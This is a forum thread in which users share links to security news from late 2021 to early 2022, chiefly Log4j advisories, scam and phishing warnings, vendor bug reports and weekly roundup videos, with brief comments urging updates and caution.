Log4j: List of vulnerable products and vendor advisories
https://www.bleepingcomputer.com/news/security/log4j-list-of-vulnerable-products-and-vendor-advisories/
-
Almost complete blocklist provided:
https://blog.fox-it.com/2021/12/12/log4shell-reconnaissance-and-post-exploitation-network-detection/
Warning various mutations seen in the wild: https://threatpost.com/apache-log4j-log4shell-mutations/176962/
polonus
-
Beware of a New Amazon Token Crypto Scam
https://blog.avast.com/beware-of-a-new-amazon-token-crypto-scam
-
Beware of a New Amazon Token Crypto Scam
https://blog.avast.com/beware-of-a-new-amazon-token-crypto-scam (https://blog.avast.com/beware-of-a-new-amazon-token-crypto-scam)
12/14/2021 Security News Flash - Amazon Token Crypto Scam
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/14/15/06/crl2o1V2aAz/preview.jpg)
https://youtu.be/us2C3YvMXF0 (https://youtu.be/us2C3YvMXF0)
Look out for offers to purchases nonexistent Amazon Crypto currency Tokens.
Thanks to Jakub Vávra for his excellent article on this topic.
https://blog.avast.com/author/jakub-v%C3%A1vra
-
Avast - 2022 Predictions
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/14/17/05/crl2bhV2aWJ/preview.jpg)
https://youtu.be/Z9XJjAbbFHQ (https://youtu.be/Z9XJjAbbFHQ)
Avast's prediction of what the 2022 Cyber security landscape will look like.
Thanks to Grace Macej for her excellent information on this topic.
https://blog.avast.com/author/grace-macej
-
In Case you'd like predictions and opinions on next years
cyber security landscape from a variety of experts in the field.
https://blog.emsisoft.com/en/39386/cyber-security-predictions-for-2022-what-the-experts-expect/
-
If you're using Gmail and other online service,
be extremely careful.
The SPAM filter isn't working as well as it used to
My inbox has seen way to many emails that are spam
Here's just one sample I just received.
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/15/17/17/crlobbV2g4b/preview.jpg)
Read the headers. If you aren't exping an email, trash it.
Even better, put it in the spam folder where it belongs.
-
12-16-2021 GOOGLE DRIVE WILL BEGIN INFORMING ITS USERS
OF CONTENT VIOLATIONS VIA EMAIL
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/16/19/41/crlDqpV25Q2/preview.jpg)
https://youtu.be/QusvmKD0afY (https://youtu.be/QusvmKD0afY)
Here is my take on Google's newest information release about files stored on Google Drive.
Thanks to ChromeUnboxed for their excellent article on this topic.
https://chromeunboxed.com/google-drive-violation-notice/
-
12-16-2021 GOOGLE DRIVE WILL BEGIN INFORMING ITS USERS
OF CONTENT VIOLATIONS VIA EMAIL
<snip image>
https://youtu.be/QusvmKD0afY (https://youtu.be/QusvmKD0afY)
Here is my take on Google's newest information release about files stored on Google Drive.
Thanks to ChromeUnboxed for their excellent article on this topic.
https://chromeunboxed.com/google-drive-violation-notice/
Interesting - whilst I have never used Google Drive and have no intention of doing so.
In order for Google to identify content violations they must have analytic access to your files. So the question is do you trust Google not to somehow benefit from rummaging through your data ?
-
12-16-2021 GOOGLE DRIVE WILL BEGIN INFORMING ITS USERS
OF CONTENT VIOLATIONS VIA EMAIL
<snip image>
https://youtu.be/QusvmKD0afY (https://youtu.be/QusvmKD0afY)
Here is my take on Google's newest information release about files stored on Google Drive.
Thanks to ChromeUnboxed for their excellent article on this topic.
https://chromeunboxed.com/google-drive-violation-notice/ (https://chromeunboxed.com/google-drive-violation-notice/)
Interesting - whilst I have never used Google Drive and have no intention of doing so.
In order for Google to identify content violations they must have analytic access to your files. So the question is do you trust Google not to somehow benefit from rummaging through your data ?
No more or less than any other online storage service.
To protect the corporation, they actually need to do this to weed out the stuff that can get Google (Alphabet into hot water.)
-
12-16-2021 GOOGLE DRIVE WILL BEGIN INFORMING ITS USERS
OF CONTENT VIOLATIONS VIA EMAIL
<snip image>
https://youtu.be/QusvmKD0afY (https://youtu.be/QusvmKD0afY)
Here is my take on Google's newest information release about files stored on Google Drive.
Thanks to ChromeUnboxed for their excellent article on this topic.
https://chromeunboxed.com/google-drive-violation-notice/ (https://chromeunboxed.com/google-drive-violation-notice/)
Interesting - whilst I have never used Google Drive and have no intention of doing so.
In order for Google to identify content violations they must have analytic access to your files. So the question is do you trust Google not to somehow benefit from rummaging through your data ?
No more or less than any other online storage service.
To protect the corporation, they actually need to do this to weed out the stuff that can get Google (Alphabet into hot water.)
Which is just one reason why I don't use any on-line storage medium, I also haven't any social networking accounts.
-
Lenovo laptops vulnerable to bug allowing admin privileges
https://www.bleepingcomputer.com/news/security/lenovo-laptops-vulnerable-to-bug-allowing-admin-privileges/
https://research.nccgroup.com/2021/12/15/technical-advisory-lenovo-imcontroller-local-privilege-escalation-cve-2021-3922-cve-2021-3969/
-
Lenovo laptops vulnerable to bug allowing admin privileges
https://www.bleepingcomputer.com/news/security/lenovo-laptops-vulnerable-to-bug-allowing-admin-privileges/
https://research.nccgroup.com/2021/12/15/technical-advisory-lenovo-imcontroller-local-privilege-escalation-cve-2021-3922-cve-2021-3969/
Lenovo again, can anyone remember a long time again when Lenovo products had a chip that had been hacked, a bug in it that could deliver malware ?
-
Weekly Security News Roundup w/e 12-17-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/17/20/02/crlbYnV2mcS/preview.jpg)
https://youtu.be/AKUHgwwPi3I (https://youtu.be/AKUHgwwPi3I)
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
New zero-day exploit for Log4j Java library is an enterprise nightmare
https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/ (https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/)
https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html (https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html)
https://www.lunasec.io/docs/blog/log4j-zero-day/ (https://www.lunasec.io/docs/blog/log4j-zero-day/)
It's already been patched.
As always, you need to update to be safe.
Update - Update - Update
Researchers release 'vaccine' for critical Log4Shell vulnerability
https://www.bleepingcomputer.com/news/security/researchers-release-vaccine-for-critical-log4shell-vulnerability/ (https://www.bleepingcomputer.com/news/security/researchers-release-vaccine-for-critical-log4shell-vulnerability/)
http://github.com/Cybereason/Logout4Shell (http://github.com/Cybereason/Logout4Shell)
Hackers start pushing malware in worldwide Log4Shell attacks
https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/ (https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/)
Most infections can be directly attributed to neglect.
They neglected to update the system with the latest available security patches and the system got hacked.
No different here.
Log4j: List of vulnerable products and vendor advisories
https://www.bleepingcomputer.com/news/security/log4j-list-of-vulnerable-products-and-vendor-advisories/
All Log4j, logback bugs we know so far and why you MUST ditch 2.15
https://www.bleepingcomputer.com/news/security/all-log4j-logback-bugs-we-know-so-far-and-why-you-must-ditch-215/
-
New zero-day exploit for Log4j Java library is an enterprise nightmare
https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/ (https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/)
https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html (https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html)
https://www.lunasec.io/docs/blog/log4j-zero-day/ (https://www.lunasec.io/docs/blog/log4j-zero-day/)
It's already been patched.
As always, you need to update to be safe.
Update - Update - Update
Researchers release 'vaccine' for critical Log4Shell vulnerability
https://www.bleepingcomputer.com/news/security/researchers-release-vaccine-for-critical-log4shell-vulnerability/ (https://www.bleepingcomputer.com/news/security/researchers-release-vaccine-for-critical-log4shell-vulnerability/)
http://github.com/Cybereason/Logout4Shell (http://github.com/Cybereason/Logout4Shell)
Hackers start pushing malware in worldwide Log4Shell attacks
https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/ (https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/)
Most infections can be directly attributed to neglect.
They neglected to update the system with the latest available security patches and the system got hacked.
No different here.
Log4j: List of vulnerable products and vendor advisories
https://www.bleepingcomputer.com/news/security/log4j-list-of-vulnerable-products-and-vendor-advisories/
All Log4j, logback bugs we know so far and why you MUST ditch 2.15
https://www.bleepingcomputer.com/news/security/all-log4j-logback-bugs-we-know-so-far-and-why-you-must-ditch-215/
Upgraded to log4j 2.16? Surprise, there's a 2.17 fixing DoS
https://www.bleepingcomputer.com/news/security/upgraded-to-log4j-216-surprise-theres-a-217-fixing-dos/
-
Tackling the real big Log4Shell insecurity.
Re: https://snyk.io/blog/log4shell-remediation-cheat-sheet/
polonus
-
Microsoft warns of easy Windows domain takeover via Active Directory bugs
https://www.bleepingcomputer.com/news/microsoft/microsoft-warns-of-easy-windows-domain-takeover-via-active-directory-bugs/
-
New Dell BIOS updates cause laptops and desktops not to boot
https://www.bleepingcomputer.com/news/technology/new-dell-bios-updates-cause-laptops-and-desktops-not-to-boot/
-
In trouble again. AWS Amazon now down for the third time this month.
See: https://downdetector.com/status/amazon/ & https://istheservicedown.com/problems/amazon
Re: https://www.tellerreport.com/tech/2021-12-22-amazon-is-experiencing-outage-for-the-third-time-in-a-short-time.ryxq23loF.html
polonus
-
It's that time of year.
Be careful even spam blockers are having problems.
I received this in my in-box this morning.
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/22/18/19/crl3FqV2NA3/preview.jpg)
-
NVIDIA discloses applications impacted by Log4j vulnerability
https://www.bleepingcomputer.com/news/security/nvidia-discloses-applications-impacted-by-log4j-vulnerability/
-
Weekly Security News Roundup w/e 12-24-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/26/16/08/crlODjV2RSy/preview.jpg)
https://youtu.be/Y1OiQQrQg_E (https://youtu.be/Y1OiQQrQg_E)
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
New zero-day exploit for Log4j Java library is an enterprise nightmare
https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/ (https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/)
https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html (https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html)
https://www.lunasec.io/docs/blog/log4j-zero-day/ (https://www.lunasec.io/docs/blog/log4j-zero-day/)
It's already been patched.
As always, you need to update to be safe.
Update - Update - Update
Researchers release 'vaccine' for critical Log4Shell vulnerability
https://www.bleepingcomputer.com/news/security/researchers-release-vaccine-for-critical-log4shell-vulnerability/ (https://www.bleepingcomputer.com/news/security/researchers-release-vaccine-for-critical-log4shell-vulnerability/)
http://github.com/Cybereason/Logout4Shell (http://github.com/Cybereason/Logout4Shell)
Hackers start pushing malware in worldwide Log4Shell attacks
https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/ (https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/)
Most infections can be directly attributed to neglect.
They neglected to update the system with the latest available security patches and the system got hacked.
No different here.
Log4j: List of vulnerable products and vendor advisories
https://www.bleepingcomputer.com/news/security/log4j-list-of-vulnerable-products-and-vendor-advisories/
All Log4j, logback bugs we know so far and why you MUST ditch 2.15
https://www.bleepingcomputer.com/news/security/all-log4j-logback-bugs-we-know-so-far-and-why-you-must-ditch-215/
Upgraded to log4j 2.16? Surprise, there's a 2.17 fixing DoS
https://www.bleepingcomputer.com/news/security/upgraded-to-log4j-216-surprise-theres-a-217-fixing-dos/
Log4j 2.17.1 out now, fixes new remote code execution bug
https://www.bleepingcomputer.com/news/security/log4j-2171-out-now-fixes-new-remote-code-execution-bug/
https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/
-
6 Things in Cybersecurity We Didn’t Know Last Year
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/29/19/17/crlUqbVoe4t/preview.jpg)
https://youtu.be/rrcoZLGZ1YY (https://youtu.be/rrcoZLGZ1YY)
Let’s look back at the year that’s been, and what we’ve learned along the way.
Thanks to TechCrunch for their excellent insight.
https://techcrunch.com/2021/12/29/six-things-we-learned-cybersecurity/
-
Weekly Security News Roundup w/e 12-31-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/31/13/26/crlwIOVo1aD/preview.jpg)
https://youtu.be/0m45tcQEL74 (https://youtu.be/0m45tcQEL74)
A recap of the weekly episodes created during 2021
-
Netgear leaves vulnerabilities unpatched in Nighthawk router
https://www.bleepingcomputer.com/news/security/netgear-leaves-vulnerabilities-unpatched-in-nighthawk-router/
https://www.tenable.com/security/research/tra-2021-57
-
Microsoft Exchange year 2022 bug in FIP-FS breaks email delivery
https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange-year-2022-bug-in-fip-fs-breaks-email-delivery/
-
Microsoft Exchange year 2022 bug in FIP-FS breaks email delivery
https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange-year-2022-bug-in-fip-fs-breaks-email-delivery/
Microsoft releases emergency fix for Exchange year 2022 bug
https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-emergency-fix-for-exchange-year-2022-bug/
-
FBI warns about ongoing Google Voice authentication scams
https://www.bleepingcomputer.com/news/security/fbi-warns-about-ongoing-google-voice-authentication-scams/
-
Weekly Security News Roundup w/e 1-7-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/01/07/13/55/c3ViINVortH/preview.jpg)
https://youtu.be/GVgo529gfWI (https://youtu.be/GVgo529gfWI)
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
Caution - Malware-Filled USB Sticks
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/01/09/22/21/c3VQ3rVoTTA/preview.jpg)
https://youtu.be/eo0UXNI35nA
The hacking groupe FIN7, has gone to great lengths to make their parcels appear innocuous.
-
KCodes NetUSB bug exposes millions of routers to RCE attacks
https://www.bleepingcomputer.com/news/security/kcodes-netusb-bug-exposes-millions-of-routers-to-rce-attacks/
-
Watch Out for Wordle Scams
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/01/12/19/04/c3VlqfVoalW/preview.jpg)
https://youtu.be/0zqgzqVVTnM (https://youtu.be/0zqgzqVVTnM)
The popular word-guessing game has inspired ad-filled copycats and other scams
on iPhone and Android.
-
New Windows Server updates cause DC boot loops, break Hyper-V
https://www.bleepingcomputer.com/news/microsoft/new-windows-server-updates-cause-dc-boot-loops-break-hyper-v/
New Windows KB5009543, KB5009566 updates break L2TP VPN connections
https://www.bleepingcomputer.com/news/microsoft/new-windows-kb5009543-kb5009566-updates-break-l2tp-vpn-connections/
-
Microsoft Defender weakness lets hackers bypass malware detection
https://www.bleepingcomputer.com/news/security/microsoft-defender-weakness-lets-hackers-bypass-malware-detection/
-
Weekly Security News Roundup w/e 1-14-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/01/14/14/40/c3V22kVop1g/preview.jpg)
https://youtu.be/hpmwKLRx6yE (https://youtu.be/hpmwKLRx6yE)
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
Malicious QR codes found in Austin
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/01/14/20/57/c3V2YPVoCbn/preview.jpg)
https://youtu.be/th--omyQgxo
QR codes started popping up everywhere. Be cautious how you use them.
Thanks to Emma McGowan for her excellent article on this topic.
https://blog.avast.com/author/emma-mcgowan
-
Beware of a new and dangerous RDP exploit
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/01/17/18/26/c3VbFOVoHR6/preview.jpg)
https://youtu.be/l_9OAVepuGM (https://youtu.be/l_9OAVepuGM)
This has affected all versions of Windows for the past 10 years –
for both desktop and servers.
Be sure to read David Strom’s full article on this
very important topic. Just follow the link below.
https://blog.avast.com/beware-of-new-rdp-exploit-avast
-
New Windows Server updates cause DC boot loops, break Hyper-V
https://www.bleepingcomputer.com/news/microsoft/new-windows-server-updates-cause-dc-boot-loops-break-hyper-v/
New Windows KB5009543, KB5009566 updates break L2TP VPN connections
https://www.bleepingcomputer.com/news/microsoft/new-windows-kb5009543-kb5009566-updates-break-l2tp-vpn-connections/
Microsoft releases emergency fixes for Windows Server, VPN bugs
https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-emergency-fixes-for-windows-server-vpn-bugs/
-
1-18-2022 Security News Flash - Apple's Safari leaking your browsing data
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/01/18/20/17/c3VFYbVo7mS/preview.jpg)
https://youtu.be/kjm-9aSaez0 (https://youtu.be/kjm-9aSaez0)
A new Safari bug has been discovered in iOS, iPadOS, and Mac.
Read the full story at:
https://www.howtogeek.com/780428/apples-safari-is-leaking-your-browsing-data/
-
Chrome Users Beware: Manifest V3 is Deceitful and Threatening
https://www.eff.org/deeplinks/2021/12/chrome-users-beware-manifest-v3-deceitful-and-threatening
Note: I reposted the info/article here per request (via PM) from Bob. :)
-
WordPress plugin flaw puts users of 20,000 sites at phishing risk
https://www.bleepingcomputer.com/news/security/wordpress-plugin-flaw-puts-users-of-20-000-sites-at-phishing-risk/
-
Weekly Security News Roundup w/e 1-21-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/01/21/13/14/c3VrI2VoWOb/preview.jpg)
https://youtu.be/_tcOtrDTzoI (https://youtu.be/_tcOtrDTzoI)
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Two troubling Headlines.
The first one affects those using McAfee
McAfee Agent bug lets hackers run code with Windows SYSTEM privileges
https://www.bleepingcomputer.com/news/security/mcafee-agent-bug-lets-hackers-run-code-with-windows-system-privileges/
The second one affects those using Windows Defender (Windows Security)
Microsoft Defender weakness lets hackers bypass malware detection
https://www.bleepingcomputer.com/news/security/microsoft-defender-weakness-lets-hackers-bypass-malware-detection/
-
Word Press-sites may be vulnerable to backdoor in Access Press Themes:
https://jetpack.com/2022/01/18/backdoor-found-in-themes-and-plugins-from-accesspress-themes/
polonus
-
FBI warns of malicious QR codes used to steal your money
https://www.bleepingcomputer.com/news/security/fbi-warns-of-malicious-qr-codes-used-to-steal-your-money/
-
FBI warns of malicious QR codes used to steal your money
https://www.bleepingcomputer.com/news/security/fbi-warns-of-malicious-qr-codes-used-to-steal-your-money/ (https://www.bleepingcomputer.com/news/security/fbi-warns-of-malicious-qr-codes-used-to-steal-your-money/)
Malicious QR codes found in Austin.
https://youtu.be/th--omyQgxo
-
Apple fixes new zero-day exploited to hack macOS, iOS devices
https://www.bleepingcomputer.com/news/apple/apple-fixes-new-zero-day-exploited-to-hack-macos-ios-devices/
-
Weekly Security News Roundup w/e 1-28-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/01/28/14/27/c3Vu2tVDYkZ/preview.jpg)
https://youtu.be/C60R9Kw-fIM (https://youtu.be/C60R9Kw-fIM)
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
Social media scammers stole at least $770 million in 2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/01/28/22/40/c3Vu3kVD3Q1/preview.jpg)
https://youtu.be/agQ7pzxIYNU (https://youtu.be/agQ7pzxIYNU)
Scams originating on social media have 'soared,' according to a new report from the FTC.
For full details, see the article on engadget. https://engt.co/3s29huz
-
1-29-2022 Security News Flash -
Another Crypto Platform Hacked, $80 Million Stolen
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/01/29/18/49/c3VUFdVD0O5/preview.jpg)
https://youtu.be/2CFuu_-AFuI (https://youtu.be/2CFuu_-AFuI)
A decentralized finance platform called Qubit was attacked,
and its users lost around $80 million in cryptocurrency.
Detail at How-To Geek: https://bit.ly/3rUyy9W
-
Windows vulnerability with new public exploits lets you become admin
https://www.bleepingcomputer.com/news/microsoft/windows-vulnerability-with-new-public-exploits-lets-you-become-admin/
-
Do you report spam/scam-mail?
For instance the Wing Ying -cjdropshipper dot com spam email?
Re: https://stopscamfraud.com/viewtopic.php?f=26&t=23348&view=previous
also: https://419scam.org/emails/2022-01/04/02115157.92.htm
polonus
-
German govt warns of APT27 hackers backdooring business networks
https://www.bleepingcomputer.com/news/security/german-govt-warns-of-apt27-hackers-backdooring-business-networks/
-
600K WordPress sites impacted by critical plugin RCE vulnerability
https://www.bleepingcomputer.com/news/security/600k-wordpress-sites-impacted-by-critical-plugin-rce-vulnerability/
-
What's the deal with Google Topics?
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/02/01/13/23/c3nVI0VDv8l/preview.jpg)
https://youtu.be/DFfF5oGfb1M (https://youtu.be/DFfF5oGfb1M)
At first glance, this initiative seems like a win for privacy advocates,
as it gives more control to the users.
Read Joe Bosso’s full article on this topic on the Avast Blog:
https://blog.avast.com/google-topics-avast
-
FBI warns of fake job postings used to steal money, personal info
https://www.bleepingcomputer.com/news/security/fbi-warns-of-fake-job-postings-used-to-steal-money-personal-info/
-
Stolen Netflix accounts
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/02/03/15/45/c3neoGVDBNk/preview.jpg)
https://youtu.be/Lbl-TZkyPRY (https://youtu.be/Lbl-TZkyPRY)
How did this happen – and what can you do about it if this happens to you?
Thanks to Luis Corrons for his advice
https://blog.avast.com/author/luis-corrons
and to Laura Josepha Zimmermann for this information.
https://blog.avast.com/author/laura-josepha-zimmermann
-
Weekly Security News Roundup w/e 2-4-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/02/05/15/43/c3nho5VDEJB/preview.jpg)
https://youtu.be/-ByEqdesEjk (https://youtu.be/-ByEqdesEjk)
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
PHP Everywhere RCE flaws threaten thousands of WordPress sites
https://www.bleepingcomputer.com/news/security/php-everywhere-rce-flaws-threaten-thousands-of-wordpress-sites/
-
Weekly Security News Roundup w/e 2-11-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/02/11/15/48/c3nXoJVbVdy/preview.jpg)
https://youtu.be/L1y8YbFYlAw (https://youtu.be/L1y8YbFYlAw)
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Payback is Sweet Revenge
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/02/12/16/15/c3nlDoVbfeh/preview.jpg)
https://youtu.be/8mvD7f86ey0 (https://youtu.be/8mvD7f86ey0)
“If they don’t see we have teeth, it’s just going to keep coming.”
Read the full article at:
https://www.wired.com/story/north-korea-hacker-internet-outage/
-
Thousands of npm-packages have outdated domainname weak links and can be hijacked.
https://arxiv.org/abs/2112.10165
pol
-
Weekly Security News Roundup w/e 2-18-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/02/18/22/43/c3nF35VbZiv/preview.jpg)
https://youtu.be/WR5I9C9EX3I (https://youtu.be/WR5I9C9EX3I)
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Delete Your Old Online Accounts Now
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/02/19/20/42/c3nqYCVbTAl/preview.jpg)
https://youtu.be/sBVm8ckhw2E (https://youtu.be/sBVm8ckhw2E)
You’ve probably signed up for a lot of online services that you no longer use.I know I have.
Don’t leave juicy targets lying around for hackers or attackers. Thanks to Chris Hoffman:
https://www.howtogeek.com/author/chrishoffman/ for his excellent article in How-To Geek:
https://www.howtogeek.com/714981/how-to-delete-your-old-online-accounts-and-why-you-should/
on this very important topic.
-
What happens to my data when I get tested for Covid?
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/02/22/15/36/c3n3ozVbxSx/preview.jpg)
https://youtu.be/ig-TkkPJ74Y (https://youtu.be/ig-TkkPJ74Y)
The biggest question most people have about Covid data is
where their vaccine information is stored.
The answer, unfortunately, isn’t as straightforward as you might think.
Thanks to Emma McGowan for her excellent article on this topic.
https://bit.ly/3BI0FOf
-
Scam email campaign masquerading as Avast sales team
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/02/23/22/21/c3n03rVbAsH/preview.jpg)
https://youtu.be/fyIYD3HlzGU (https://youtu.be/fyIYD3HlzGU)
Avast has become aware of an email scam campaign purporting to be from our sales team.
https://blog.avast.com/fake-avast-email-scam-avast
-
Weekly Security News Roundup w/e 2-25-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/02/25/14/48/c3nT2JVb5Ur/preview.jpg)
https://youtu.be/MV5VNRsFTS0 (https://youtu.be/MV5VNRsFTS0)
Security-related news thanks mostly to Avast Software.
I'm just a messenger. They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Avast warns users of crypto scams
taking advantage of Ukraine conflict
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/02/25/22/15/c3nT3oVbEJI/preview.jpg)
https://youtu.be/V5edmrjSEsc (https://youtu.be/V5edmrjSEsc)
Avast security experts have detected scammers pretending to be Ukrainian nationals
affected by the current conflict asking for Bitcoin on social media.
-
If you receive one of these in your inbox,
put it in the trash where it belongs.
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/03/01/14/45/c3eV2GVbMvw/preview.jpg)
Especially when it's sent to you via a Gmail address:
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/03/01/14/47/c3eV2HVbMvM/preview.jpg)
-
Avast ThreatLabs warns against joining
in DDOS attacks in aid of Ukraine
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/03/01/22/27/c3eV3tVbLRy/preview.jpg)
https://youtu.be/ViJNysn3oPI (https://youtu.be/ViJNysn3oPI)
"Simple tools" allow regular people to participate in DDOS attacks in aid of Ukraine.
But these tools are not safe, say Avast ThreatLabs researchers.
-
Hundreds of eBike phishing sites abuse Google Ads to push scams
https://www.bleepingcomputer.com/news/security/hundreds-of-ebike-phishing-sites-abuse-google-ads-to-push-scams/
-
Weekly Security News Roundup w/e 3-4-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/03/04/16/40/c3efDkVFnur/preview.jpg)
https://youtu.be/pHdFNPR9oiA (https://youtu.be/pHdFNPR9oiA)
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Malware now using stolen NVIDIA code signing certificates
https://www.bleepingcomputer.com/news/security/malware-now-using-stolen-nvidia-code-signing-certificates/
-
Malware now using stolen NVIDIA code signing certificates
https://www.bleepingcomputer.com/news/security/malware-now-using-stolen-nvidia-code-signing-certificates/ (https://www.bleepingcomputer.com/news/security/malware-now-using-stolen-nvidia-code-signing-certificates/)
Apparently Lapsus$ is also responsible for stealing almost 200 GB of
sensitive data from Samsung. They've been busy.
https://www.engadget.com/samsung-lapsus-leak-181517961.html?src=rss
-
DDoS hacktivism: A highly risky exercise
https://blog.avast.com/ddos-hacktivism-avast
-
DDoS hacktivism: A highly risky exercise
https://blog.avast.com/ddos-hacktivism-avast (https://blog.avast.com/ddos-hacktivism-avast)
https://youtu.be/ViJNysn3oPI
-
FBI: Govt officials impersonated in widespread extortion schemes
https://www.bleepingcomputer.com/news/security/fbi-govt-officials-impersonated-in-widespread-extortion-schemes/
-
HP patches 16 UEFI firmware bugs allowing stealthy malware infections
https://www.bleepingcomputer.com/news/security/hp-patches-16-uefi-firmware-bugs-allowing-stealthy-malware-infections/
-
CISA updates Conti ransomware alert with nearly 100 domain names
https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/
-
Threat advisory: Cybercriminals compromise users with malware disguised as pro-Ukraine cyber tools
https://blog.talosintelligence.com/2022/03/threat-advisory-cybercriminals.html
-
Weekly Security News Roundup w/e 3-11-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/03/11/12/34/c3eXl4VF3LN/preview.jpg)
https://youtu.be/P2j7T1_Ec6g (https://youtu.be/P2j7T1_Ec6g)
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
So, this just arrived in my in-box
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/03/12/16/38/c3elDBVFTwP/preview.jpg)
Now I know this is a scam and probably a phishing attempt.
Considering the high prices of food and gas, there are many
who look at this and say "Oh good, I can use a helping hand."
They may very well be tempted to click on that tempting link to
Check what you won
Don't do it regardless of how much help you may need.
This will only make things worse not better.
Do what I did with this email,
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/03/12/16/49/c3elDdVFTxd/preview.jpg) Report it as SPAM
-
So, this just arrived in my in-box
<snip image>
Now I know this is a scam and probably a phishing attempt.
Considering the high prices of food and gas, there are many
who look at this and say "Oh good, I can use a helping hand."
They may very well be tempted to click on that tempting link to
Check what you won
Don't do it regardless of how much help you may need.
This will only make things worse not better.
Do what I did with this email,
<snip image> Report it as SPAM
I get stuff like this, some supposedly from a popular Financial advice and deals guy, but he doesn't do anything like this, but many will just see the name and dumbly open it to see what it is about. I also get some supposedly having come from Microsoft, there are just too many scams/phishing attempts out there.
I use MailWasherPro, it downloads a very small part of the email (in plain text), it can be set to use SpamCop, SpamHaus and other vetting tools so it is very effective vetting process. At the end of the vetting and my own decisions, I have it open my email client and I download the remainder.
-
QNAP warns severe Linux bug affects most of its NAS devices
